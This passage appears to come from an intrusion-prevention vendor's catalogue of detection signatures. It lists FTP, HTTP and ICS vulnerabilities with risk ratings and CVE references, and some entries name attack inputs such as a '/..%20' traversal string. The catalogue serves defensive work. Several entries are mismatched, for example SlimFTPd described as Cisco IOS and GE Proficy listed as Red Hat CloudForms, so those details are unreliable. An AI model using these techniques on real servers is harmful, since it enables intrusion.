Description: A vulnerability exists in ProFTPD that could be exploited by remote attackers to conduct SQL injection attacks on the server. This flaw is due to improper validation of a user-supplied username string before being used in an SQL query. A remote unauthenticated attacker can trigger this vulnerability by sending a malicious username to the target ProFTPD server and gain the privileges of a legitimate user. A successful attack can allow the attacker to masquerade as an authenticated user and, depending upon their privileges, gain unauthorized access and cause denial of service.
Situation: FTP_CS-ProFTPD-User-SQL-Injection
References:
CVE-2009-0542
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0542
BID-33722
http://www.securityfocus.com/bid/33722
Back to top

FTP-Selfreferencing-Path

About this vulnerability: Selfreferencing path
Risk: Low
First detected in: sgpkg-ips-100-1314
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Generic FTP server
Type: Directory Traversal
Description: A selfreferencing "./." path detected. This might be related to buffer overflow type of attacks for example.
Situation: FTP_CS-Very-Long-Self-Referencing-Path
Back to top

FTP-Serv-U-Directory-Traversal

About this vulnerability: Serv-U FTP server directory traversal vulnerability
Risk: Moderate
First detected in: sgpkg-ips-6-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Serv-U FTP Server
Type: Directory Traversal
Description: Versions 2.4 and 2.5 of the Serv-U FTP server allow directory traversal via a /..%20 in the directory name. Users have the same access permissions as in their home directory to any files that reside on the same partition as ftproot. This vulnerability can be exploited by authenticated remote users to read or write to any files on the host.
Situation: FTP_CS-Serv-U-Directory-Traversal
References:
CVE-2001-0054
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0054
BID-2052
http://www.securityfocus.com/bid/2052
OSVDB-464
http://www.osvdb.org/464
Back to top

FTP-Serv-U-FTP-Server-Buffer-Overflow

About this vulnerability: Serv-U FTP Server Buffer Overflow
Risk: High
First detected in: sgpkg-ips-7-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Serv-U FTP Server
Type: Buffer Overflow
Description: Buffer overflows in Serv-U FTP Server allow remote attackers to execute arbitrary code via long command arguments.
Situation: FTP_CS-Serv-U-Cwd-BOF
References:
CVE-1999-0219
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0219
BID-269
http://www.securityfocus.com/bid/269
Back to top

FTP-Serv-U-MDTM-Command-Buffer-Overflow

About this vulnerability: Serv-U FTP Server MTDM Command Buffer Overflow
Risk: High
First detected in: sgpkg-ips-11-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Serv-U FTP Server
Type: Buffer Overflow
Description: Buffer overflow in Serv-U FTP before 5.0.0.4 allows remote authenticated users to execute arbitrary code via a long timezone argument to the MDTM command.
Situation: FTP_CS-Serv-U-MDTM-Timezone-Buffer-Overflow
FTP_CS-Serv-U-MDTM-Command-Buffer-Overflow-1
References:
CVE-2004-0330
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0330
BID-9751
http://www.securityfocus.com/bid/9751
OSVDB-4073
http://www.osvdb.org/4073
Back to top

FTP-Serv-U-Site-Chmod-Command-Buffer-Overflow

About this vulnerability: Serv-U FTP Server SITE CHMOD Command Buffer Overflow
Risk: High
First detected in: sgpkg-ips-11-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Serv-U FTP Server
Type: Buffer Overflow
Description: The Serv-u FTP Server is prone to a buffer overflow while handling the "site chmod" command with a filename containg excessive data. This condition may be exploited by attackers to execute arbitrary commands on the server.
Situation: FTP_CS-Serv-U-Site-Chmod-Command-Buffer-Overflow-1
FTP_CS-Serv-U-Site-Chmod-Command-Buffer-Overflow-2
FTP_CS-Serv-U-Site-Chmod-Command-Buffer-Overflow-3
FTP_CS-Serv-U-Site-Chmod-Command-Buffer-Overflow-4
FTP_CS-Serv-U-Site-Chmod-Command-Buffer-Overflow-5
References:
BID-9675
http://www.securityfocus.com/bid/9675
OSVDB-3713
http://www.osvdb.org/3713
Back to top

FTP-Server-Shell-Command-Execution

About this vulnerability: Attempt to execute shell commands
Risk: Moderate
First detected in: sgpkg-ips-441-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Malfunction
Description: This fingerprint detects attempts to execute shell commands on an FTP server
Situation: FTP_CS-Shell-Command-Execution
Back to top

FTP-SlimFTPd-List-Buffer-Overflow

About this vulnerability: Buffer Overflow in SlimFTPd
Risk: High
First detected in: sgpkg-ips-169-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: WhitSoft SlimFTPd
Type: Buffer Overflow
Description: A remotely exploitable buffer overflow exists in Cisco IOS FTP server.
Situation: FTP_CS-Oversized-List-Argument-Buffer-Overflow
References:
BID-14339
http://www.securityfocus.com/bid/14339
OSVDB-18172
http://www.osvdb.org/18172
Back to top

FTP-Solaris-Globbing-Vulnerability

About this vulnerability: Solaris shadow password file disclosure fia ftpd
Risk: Low
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-1296-5242
Platform: Solaris
Software: Solaris ftpd
Type: Buffer Overflow
Description: Due to a known buffer overflow condition in glob(), an attacker is able to cause the FTP server to crash, causing parts of the shadow password file to be dumped in a world-readable core file in the root directory. This way the attacker may be able to obtain passwords and therefore gain elevated privileges.
Situation: FTP_CS-Cwd-Home-Solaris-Information-Disclosure
References:
CVE-2001-0421
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0421
BID-2601
http://www.securityfocus.com/bid/2601
Back to top

FTP-Usage

About this vulnerability: FTP usage detection
Risk: Low
First detected in: sgpkg-ips-126-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Generic FTP server
Type: Remote Control
Description: This vulnerability is referenced by fingerprints that detect FTP protocol usage. FTP transfers all data between the client and the server in cleartext making it possible for third parties to listen for sensitive data such as passwords.
Situation: FTP_CS-Password
Back to top

FTP-Wftpd-Long-Argument-Buffer-Overflow

About this vulnerability: Buffer overflow in Wftpd
Risk: High
First detected in: sgpkg-ips-214-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: WFTPD
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in Wftpd ftp server. When an oversized argument is given with the STAT, NLST or LIST command, a buffer overflow occurs. If successfully exploited, the attacker can execute arbitrary commands on the server.
Situation: FTP_CS-Oversized-Stat-Argument
FTP_CS-Oversized-List-Argument
FTP_CS-Oversized-Nlst-Argument
References:
CVE-2004-0340
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0340
BID-9767
http://www.securityfocus.com/bid/9767
Back to top

FTP-Wftpd-Mkd-Cwd

About this vulnerability: Wftpd Mkd Cwd
Risk: Moderate
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: WFTPD
Type: Buffer Overflow
Description: WFTPD v2.34,v2.40 Server and earlier are vulnerable to remotely exploitable MKD CWD arguments buffer overflow.
Situation: FTP_CS-Wftpd-Mkd-Cwd
References:
CVE-1999-0950
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0950
BID-747
http://www.securityfocus.com/bid/747
Back to top

FTP-Win-G6-Dele-Rnfr-Path-Disclosure

About this vulnerability: Path disclosure vulnerability in G6 ftpd software
Risk: Low
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: G6 FTP server
Type: Malfunction
Description: Succesfull exploitation of this vulnerability reveals the attacker the G6 FTP full installation path. This information may help the attacker and give some leverage to initiate more severe attacks in order to compromise the server.
Situation: FTP_CS-Windows-G6-Path-Disclosure
Back to top

FTP-Windows-Retr-Get-Drive-Letter

About this vulnerability: Windows RETR get drive letter
Risk: Moderate
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Generic FTP server
Type: Malfunction
Description: Some FTP servers running on windows platform may suffer of a denial of service condition if drive letters are specified in the request. This happens especially with the drive A:\.
Situation: FTP_CS-Windows-Any-Ftpd-Retr-Get-DoS
References:
CVE-2001-0695
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0695
Back to top

FTP-Ws-FTP-Server-Site-iFtpSvc-Remote-Command-Execution

About this vulnerability: WS_FTP server Siten iFtpSvc Remote Command Execution
Risk: High
First detected in: sgpkg-ips-249-3038
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: WS_FTP Server
Type: Malfunction
Description: Ipswitch WS_FTP FTP server allows remote authenticated users to execute arbitrary commands as SYSTEM by exploiting a vulnerability in the SITE command.
Situation: FTP_CS-Ws-FTP-Server-iFtpSvc-System-Compromise
References:
CVE-2004-1885
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1885
BID-9953
http://www.securityfocus.com/bid/9953
Back to top

FTP-Ws-FTP-Server-XCRC-XMD5-XSHA1-Command-Buffer-Overflow

About this vulnerability: WS_FTP server buffer overflow with commands XCRC,XMD5 and XSHA1
Risk: High
First detected in: sgpkg-ips-80-1314
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: WS_FTP Server
Type: Buffer Overflow
Description: WS_FTP FTP server implements nonstandard commands XCRC, XMD5 and XSHA1 for file integrity checking. The first argument to these commands is <filename>, which is copied by the software to a fixed size buffer without any boundary checking. A filename parameter of over 672 characters will overflow the buffer and affect the program's execution. This vulnerability allows users to execute arbitrary code on the FTP server by sending a malicious query.
Situation: FTP_CS-Ws-FTP-Server-XCRC-XMD5-XSHA1-Command-Buffer-Overflow
References:
CVE-2006-4847
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4847
BID-20076
http://www.securityfocus.com/bid/20076
OSVDB-28939
http://www.osvdb.org/28939
Back to top

FTP-WU-FTPD-Site-Exec

About this vulnerability: Site exec vulnerability in WU-FTPD
Risk: High
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1296-5242
Platform: Unix
Software: WU-FTPD
Type: Insecure Configuration
Description: WU-FTPD FTP server allows root access via site exec command.
Situation: FTP_CS-WU-FTPD-Site-Exec-Sh
References:
CVE-1999-0080
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0080
BID-2241
http://www.securityfocus.com/bid/2241
OSVDB-77
http://www.osvdb.org/77
Back to top

FTP-WU-FTPD-Site-Newer-Command-Execution

About this vulnerability: WU-FTPD resource starvation vulnerability
Risk: High
First detected in: sgpkg-ips-6-1102
Last changed: sgpkg-ips-1296-5242
Platform: Linux; SCO
Software: WU-FTPD
Type: Resource Starvation
Description: The "site newer" command in WU-FTPD consumes excessive amounts of memory, which can be used in a denial-of-service attack. Also, if the attacker can create files on the system, they may be able to exploit this vulnerability to execute arbitrary code on the server with the FTP daemon privileges.
Situation: FTP_CS-WU-FTPD-Site-Newer-Command-Execution
References:
CVE-1999-0880
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0880
BID-737
http://www.securityfocus.com/bid/737
Back to top

FTP-WU-FTPD-Use-Compress

About this vulnerability: WU-FTPD Use compress vulnerability
Risk: High
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1296-5242
Platform: Unix
Software: WU-FTPD
Type: Malfunction
Description: WU-FTPD contains remote vulnerability which can be exploited trough --use-compress-program with invalid arguments leading to a system compromise.
Situation: FTP_CS-WU-FTPD-Use-Compress
References:
CVE-1999-0997
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0997
BID-2240
http://www.securityfocus.com/bid/2240
Back to top

FTPShell-Client-Enterprise-Edition-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in FTPShell Client Enterprise Edition
Risk: High
First detected in: sgpkg-ips-1111-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: FTPShell
Type: Buffer Overflow
Description: A buffer overflow vulnerability in FTPShell Client 6.70 Enterprise Edition which allows remote attackers to perform remote code execution through the FTP 220 response code.
Situation: FTP_SS-FTPShell-Client-Enterprise-Edition-Stack-Buffer-Overflow
References:
CVE-2018-7573
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7573
Back to top

Fuel-CMS-SQL-Injection-CVE-2020-17463

About this vulnerability: An attempt to exploit a vulnerability in Fuel CMS detected
Risk: High
First detected in: sgpkg-ips-1419-5242
Last changed: sgpkg-ips-1419-5242
Platform: Generic
Software: Fuel CMS
Type: Input Validation
Description: An SQL injection vulnerability exists in the Fuel CMS version 1.4.7.
Situation: HTTP_CRL-Fuel-CMS-SQL-Injection-CVE-2020-17463
References:
CVE-2020-17463
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17463
Back to top

Fuji-Electric-V-Server-Heap-Buffer-Overflow

About this vulnerability: A vulnerability in Fuji Electric V-Server
Risk: Moderate
First detected in: sgpkg-ips-1228-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Fuji Electric V-Server
Type: Buffer Overflow
Description: A heap-based buffer overflow vulnerability has been reported in Fuji Electric V-Server. The vulnerability is due to improper validation of user-supplied data in VPR project files. A remote, unauthenticated attacker could exploit this vulnerability by enticing a target user into opening a crafted VPR file. Successful exploitation allows the attacker to execute arbitrary code under the security context of the application process.
Situation: File-Binary_Fuji-Electric-V-Server-Heap-Buffer-Overflow
References:
CVE-2019-18240
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-18240
Back to top

Full-Width-And-Half-Width-Unicode-Encoding-Evasion

About this vulnerability: Full-Width-And-Half-Width-Unicode-Encoding-Evasion
Risk: Moderate
First detected in: sgpkg-ips-632-5211
Last changed: sgpkg-ips-1296-5242
Platform: Any Operating System
Software: <os>
Type: Input Validation
Description: There is a vulnerability in several HTTP content scanning systems that allows unicode encoded traffic go past unscanned.
Situation: HTTP_CRL-Possible-Full-Width-And-Half-Width-Unicode-Encoding-Evasion
Back to top

FunWebProducts

About this vulnerability: FunWebProducts browser plugin
Risk: Low
First detected in: sgpkg-ips-39-1210
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: FunWebProducts
Type: Misconfiguration
Description: FunWebProducts is a plugin for Internet Explorer. It displays advertisements and may be considered unwanted software by some organizations.
Situation: HTTP_CSH-FunWebProducts-Activity
Back to top

Furtims-Parent-Nullptr-Host-Field

About this vulnerability: Hostname linked with Furtim's Parent malware activity
Risk: High
First detected in: sgpkg-ips-779-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Post Compromise Behaviour
Description: A suspicious "nullptr" hostname field in HTTP traffic. This hostname has been linked with an advanced malware known as Furtim's Parent. Seeing this traffic might indicate a system compromise.
Situation: HTTP_CSH-Furtims-Parent-Nullptr-Host-Field
Back to top

FusionPBX-Command-Exec.php-Command-Execution

About this vulnerability: A vulnerability in FusionPBX
Risk: High
First detected in: sgpkg-ips-1206-5242
Last changed: sgpkg-ips-1296-5242
Platform: Linux; Unix
Software: FusionPBX
Type: Input Validation
Description: There exists a vulnerability in the FusionPBX, version 4.4.1, which allows remote attackers to execute arbitrary code through exec.php, due to unsufficient user input validation.
Situation: HTTP_CRL-FusionPBX-Command-Exec.php-Command-Execution
Back to top

FusionPBX-Fax-Server-Fax_Send-Command-Injection

About this vulnerability: A vulnerability in FusionPBX
Risk: Moderate
First detected in: sgpkg-ips-1407-5242
Last changed: sgpkg-ips-1407-5242
Platform: Generic
Software: FusionPBX
Type: Input Validation
Description: Insufficient input validation on the fax_extension parameter causes a command injection vulnerability in FusionPBX. A successful attack allows arbitrary commands to be executed on the target system.
Situation: HTTP_CS-FusionPBX-Fax-Server-Fax_Send-Command-Injection
References:
CVE-2021-43405
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-43405
Back to top

FusionPBX-Operator-Panel-Exec.php-Command-Execution

About this vulnerability: A vulnerability in FusionPBX
Risk: High
First detected in: sgpkg-ips-1206-5242
Last changed: sgpkg-ips-1296-5242
Platform: Linux; Unix
Software: FusionPBX
Type: Input Validation
Description: There exists a vulnerability in the FusionPBX, versions 4.4.3 and before, which allows remote attackers to execute arbitrary code by sending a 'system' command to the FreeSWITCH event socket interface, due to unsufficient user input validation.
Situation: HTTP_CS_FusionPBX-Operator-Panel-Exec.php-Command-Execution
References:
CVE-2019-11409
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11409
Back to top

FusionPBX-Service-Edit-Command-Injection

About this vulnerability: A vulnerability in FusionPBX
Risk: High
First detected in: sgpkg-ips-1352-5242
Last changed: sgpkg-ips-1352-5242
Platform: Linux
Software: FusionPBX
Type: Input Validation
Description: There exists a vulnerability in FusionPBX, versions 4.4.8, which allows remote attackers to execute arbitrary code via the service_cmd_start parameter to service_edit.php due to insufficient user input validation.
Situation: HTTP_CRL-JFusionPBX-Service-Edit-Command-Injection
References:
CVE-2019-15029
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15029
Back to top

FXC-AE1021PE-Router-Command-Injection-CVE-2023-49897

About this vulnerability: A vulnerability in FXC AE1021PE router firmware
Risk: High
First detected in: sgpkg-ips-1729-5242
Last changed: sgpkg-ips-1729-5242
Platform: Generic
Software: FXC AE1021PE
Type: Input Validation
Description: An OS command injection vulnerability has been reported in the firmware of the FXC AE1021PE and AE1021 wireless routers. An authenticated attacker can use this vulnerability to execute arbitrary commands.
Situation: HTTP_CRL-FXC-AE1021PE-Router-Command-Injection-CVE-2023-49897
References:
CVE-2023-49897
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-49897
Back to top

G-LED-Assistant-Remove3dlut-Directory-Traversal

About this vulnerability: A vulnerability in LG LED Assistant
Risk: Moderate
First detected in: sgpkg-ips-1698-5242
Last changed: sgpkg-ips-1698-5242
Platform: Generic
Software: LG LED Assistant
Type: Directory Traversal
Description: Improper input validation of user-sent data in the remove3DLUT function causes a directory traversal vulnerability in LG LED Assistant. A successful exploitation allows an attacker to delete files or cause a denial of service condition on the target system.
Situation: HTTP_CRL-LG-LED-Assistant-Remove3dlut-Directory-Traversal
Back to top

Gafgyt-Linux-Infection-Traffic

About this vulnerability: Gafgyt Linux infection traffic was detected
Risk: High
First detected in: sgpkg-ips-1355-5242
Last changed: sgpkg-ips-1355-5242
Platform: Linux
Software: <os>
Type: Backdoor
Description: Gafgyt Linux infection traffic was detected.
Situation: Generic_CS-Gafgyt-Linux-Infection-Traffic
Back to top

Galaxy-Store-Improper-Access-Control-CVE-2023-21433

About this vulnerability: A vulnerability in Galaxy Store
Risk: Moderate
First detected in: sgpkg-ips-1865-5242
Last changed: sgpkg-ips-1865-5242
Platform: Generic
Software: Galaxy Store
Type: Malfunction
Description: An improper access control vulnerability in Galaxy App Store versions prior to 4.5.49.8 allows any installed application to install additional applications from the Galaxy Store arbitrarily and without the knowledge of the user.
Situation: Generic_CS-Galaxy-Store-Improper-Access-Control-CVE-2023-21433
References:
CVE-2023-21433
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-21433
Back to top

Galaxy-Store-Webview-Filter-Bypass-CVE-2023-21434

About this vulnerability: A vulnerability in Galaxy Store
Risk: Moderate
First detected in: sgpkg-ips-1865-5242
Last changed: sgpkg-ips-1865-5242
Platform: Generic
Software: Galaxy Store
Type: Malfunction
Description: Insufficient input validation in Galaxy App Store versions prior to 4.5.49.8 allows bypassing the webview domain filtering. An attacker could exploit this by enticing the target user into clicking a crafted hyperlink. A successful exploit can cause arbitrary Javascript execution via an attacker-controlled web page.
Situation: File-Text_Galaxy-Store-Webview-Filter-Bypass-CVE-2023-21434
References:
CVE-2023-21434
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-21434
Back to top

Galil-RIO-DoS-CVE-2013-0699

About this vulnerability: A vulnerability in Galil RIO
Risk: Moderate
First detected in: sgpkg-ips-610-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Galil RIO
Type: Malfunction
Description: There is a denial of service vulnerability in Galil RIO
Situation: Generic_CS-Galil-RIO-DoS-CVE-2013-0699
References:
CVE-2013-0699
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0699
Back to top

Gallery-Cross-Site-Scripting

About this vulnerability: A vulnerability in Gallery
Risk: High
First detected in: sgpkg-ips-415-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Gallery
Type: Cross-site Scripting
Description: A Cross Site scripting security breach in open source image management system Gallery
Situation: HTTP_CSU-Gallery-Cross-Site-Scripting
References:
CVE-2003-0614
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0614
BID-8828
http://www.securityfocus.com/bid/8828
Back to top

Gambio-Online-Webshop-Unauthenticated-PHP-Deserialization-Vulnerability

About this vulnerability: An attempt to exploit a vulnerability in Gambio Online Webshop detected
Risk: High
First detected in: sgpkg-ips-1720-5242
Last changed: sgpkg-ips-1720-5242
Platform: Generic
Software: Gambio Online Webshop
Type: Input Validation
Description: A vulnerability in Gambio Online Webshop, versions 4.9.2.0 and before, which allows remote attackers to execute arbitrary code through the search parameter in a POST request to Parcelshopfinder/AddAddressBookEntry.
Situation: HTTP_CRL-Gambio-Online-Webshop-Unauthenticated-PHP-Deserialization-Vulnerability
References:
CVE-2024-23759
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-23759
Back to top

GAMSoft-TelSrv-Username-Buffer-Overflow

About this vulnerability: A GAMSoft TelSrv Username Buffer Overflow vulnerability
Risk: Moderate
First detected in: sgpkg-ips-775-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: GAMSoft TelSrv
Type: Malfunction
Description: A vulnerability in GAMSoft TelSrv, versions 1.5 and before, which allows remote attackers to cause a denial of service condition via a long username.
Situation: Telnet_CS-GAMSoft-TelSrv-Username-Buffer-Overflow
References:
CVE-2000-0665
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0665
Back to top

Ganglia-Meta-Daemon-Process-Path-Stack-Buffer-Overflow

About this vulnerability: A buffer overflow vulnerability in Ganglia meta daemon process
Risk: High
First detected in: sgpkg-ips-202-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Ganglia
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in the Ganglia meta daemon (gmetad). The vulnerability is a boundary error while processing a long path element. A remote attacker can exploit this vulnerability by sending a malicious request to the server. Successful exploitation may lead to arbitrary code execution in the security context of the logged in user.
Situation: Generic_CS-Ganglia-Meta-Daemon-Process-Path-Stack-Buffer-Overflow
References:
CVE-2009-0241
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0241
BID-33299
http://www.securityfocus.com/bid/33299
Back to top

Gator

About this vulnerability: Gator software
Risk: Low
First detected in: sgpkg-ips-33-1210
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Gator
Type: Misconfiguration
Description: Gator is considered unwanted software by some organizations. This product serves popup advertisments to the user and sends some information to Claria.
Situation: HTTP_CSH-Gator-User-Agent
HTTP_CSH-Gain-Publishing-Installer
Back to top

Gauss-Bot

About this vulnerability: Gauss Bot
Risk: High
First detected in: sgpkg-ips-618-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Code Injection
Description: Gauss is a password stealing Trojan which attempts to steal system information and various credentials.
Situation: HTTP_CSH-Gauss-Bot-Traffic-Detected
Back to top

GD-Library-Libgd-gd2getheader-Integer-Overflow

About this vulnerability: A vulnerability in GD Library libgd
Risk: Moderate
First detected in: sgpkg-ips-790-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: GD Graphics Library
Type: Integer Overflow
Description: An integer overflow causes a heap buffer overflow vulnerability in libgd, which is included in PHP. A successful exploit allows an attacker to run arbitrary code on the target system.
Situation: File-Binary_GD-Library-Libgd-gd2getheader-Integer-Overflow
References:
CVE-2016-5766
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5766
Back to top

GD-Library-Libgd-Heap-Buffer-Overflow-CVE-2016-3074

About this vulnerability: A vulnerability in GD Library libgd
Risk: Moderate
First detected in: sgpkg-ips-766-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: GD Graphics Library
Type: Buffer Overflow
Description: A buffer overflow resulting from a signedness error in libgd can be exploited by sending a crafted GD2 file to the target. A successful exploitation can lead to code execution with the privileges of the exploited process.
Situation: File-Binary_GD-Library-Libgd-GD_gd2.c-Heap-Buffer-Overflow
References:
CVE-2016-3074
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3074
Back to top

GE-D20-Commands

About this vulnerability: Configuration commands related with GE D20 operation
Risk: Moderate
First detected in: sgpkg-ips-616-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: GE D20
Type: Misconfiguration
Description: User commands related with GE D20 substation controller. Detecting these commands may indicate unauthorized access to configuration tools.
Situation: Telnet_CS-GE-D20-Remote-Diagnostic-Self-Test
Telnet_CS-GE-D20-Feature-Request
Telnet_CS-GE-D20-Reboot
Telnet_GE-D20-Clear-Audit-Log-Attempt
Telnet_GE-D20-Display-Access-Change-Attempt
Telnet_GE-D20-View-Device-Status
Telnet_GE-D20-Invalid-Command
Telnet_GE-D20-Logoff
Telnet_GE-D20-Update-Date-Time
Telnet_GE-D20-Successful-Login
Telnet_GE-D20-Failed-Login
TFTP_GE-D20-Config-File-Change-Attempt
Back to top

GE-Fanuc-Proficy-HMI/SCADA-CIMPLICITY-Webserver-Information-Disclosure

About this vulnerability: A vulnerability in Ge Fanuc Proficy CIMPLICITY HMI server
Risk: High
First detected in: sgpkg-ips-608-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Ge Fanuc Proficy CIMPLICITY HMI server
Type: Malfunction
Description: There is an information disclosure vulnerability in Ge Fanuc Proficy CIMPLICITY HMI server which allows attackers to download webview.cfg which contains scada's users credentials.
Situation: HTTP_CRL-GE-Fanuc-Proficy-HMI/SCADA-CIMPLICITY-Webserver-Information-Disclosure
References:
CVE-2014-0750
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0750
BID-65124
http://www.securityfocus.com/bid/65124
Back to top

GE-Fanuc-Real-Time-Portal-Sensitive-Information-Disclosure

About this vulnerability: A vulnerability in GE Fanuc Real Time Portal
Risk: High
First detected in: sgpkg-ips-608-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Ge Fanuc Real Time Portal
Type: Malfunction
Description: There is an information disclosure vulnerability in Ge Fanuc Real Time Portal which allows an attacker to disclose sensitive information.
Situation: HTTP_CS_GE-Fanuc-Real-Time-Portal-Sensitive-Information-Disclosure
HTTP_CSU_GE-Fanuc-Real-Time-Portal-Sensitive-Information-Disclosure
Back to top

GE-Mds-Pulsenet-Filedownloadservlet-Directory-Traversal

About this vulnerability: A vulnerability in General Electric MDS PulseNET
Risk: Moderate
First detected in: sgpkg-ips-694-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: General Electric MDS PulseNET
Type: Directory Traversal
Description: The GE MDS PulseNET products have insufficient validation in the FileDownloadServlet. It allows unauthenticated file operations via a directory traversal.
Situation: HTTP_CSU-GE-Mds-Pulsenet-Filedownloadservlet-Directory-Traversal
References:
CVE-2015-6459
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6459
Back to top

GE-Mds-Pulsenet-Hidden-Support-Account-Remote-Code-Execution

About this vulnerability: A vulnerability in General Electric MDS PulseNET
Risk: High
First detected in: sgpkg-ips-691-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: General Electric MDS PulseNET
Type: Malfunction
Description: A default credential vulnerability has been reported in GE MDS PulseNET. The vulnerability is due to static credentials of a hidden support account permitting administrator access to the system. A remote attacker can exploit these default credentials to access the system. Once authenticated, the attacker can perform various administrative tasks. This may lead to the execution of arbitrary code under the permissions of System.
Situation: HTTP_CRL-GE-Mds-Pulsenet-Hidden-Support-Account-Remote-Code-Execution
References:
CVE-2015-6456
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6456
Back to top

GE-Mds-Pulsenet-Remote-Invocation-Insecure-Deserialization

About this vulnerability: A vulnerability in General Electric MDS PulseNET
Risk: Moderate
First detected in: sgpkg-ips-1080-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: General Electric MDS PulseNET
Type: Input Validation
Description: There has been reported a vulnerability in GE MDS PulseNET and PulseNET Enterprise. A remote unauthenticated attacker can exploit this vulnerability by sending a specially crafted serialized object to the target server. Successful exploitation might lead to arbitrary code execution.
Situation: Generic_CS-GE-Mds-Pulsenet-Remote-Invocation-Insecure-Deserialization
References:
CVE-2018-10611
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10611
Back to top

GE-Mds-Pulsenet-Spring-Remoting-Httpinvoker-Insecure-Deserialization

About this vulnerability: A vulnerability in General Electric MDS PulseNET
Risk: Moderate
First detected in: sgpkg-ips-1081-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: General Electric MDS PulseNET
Type: Input Validation
Description: Deserialization of untrusted data causes a vulnerability in General Electric MDS PulseNET. A successful exploit allows an attacker to run arbitrary code with the privileges of the PulseNET program.
Situation: File-Binary_GE-Mds-Pulsenet-Spring-Remoting-Httpinvoker-Insecure-Deserialization
References:
CVE-2018-10611
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10611
Back to top

GE-Proficy-CIMPLICITY-WebView-Directory-Traversal

About this vulnerability: A GE Proficy CIMPLICITY WebView Directory Traversal vulnerability.
Risk: High
First detected in: sgpkg-ips-701-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Red Hat CloudForms
Type: Input Validation
Description: A directory traversal vulnerability in GE Proficy Cimplicity WebView, versions 4.01 through 8.0, in substitute.bcl, which allows remote attackers to read arbitrary files via a crafted packet.
Situation: HTTP_CSU-System-File-Disclosure
References:
CVE-2013-0653
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0653
BID-57505
http://www.securityfocus.com/bid/57505
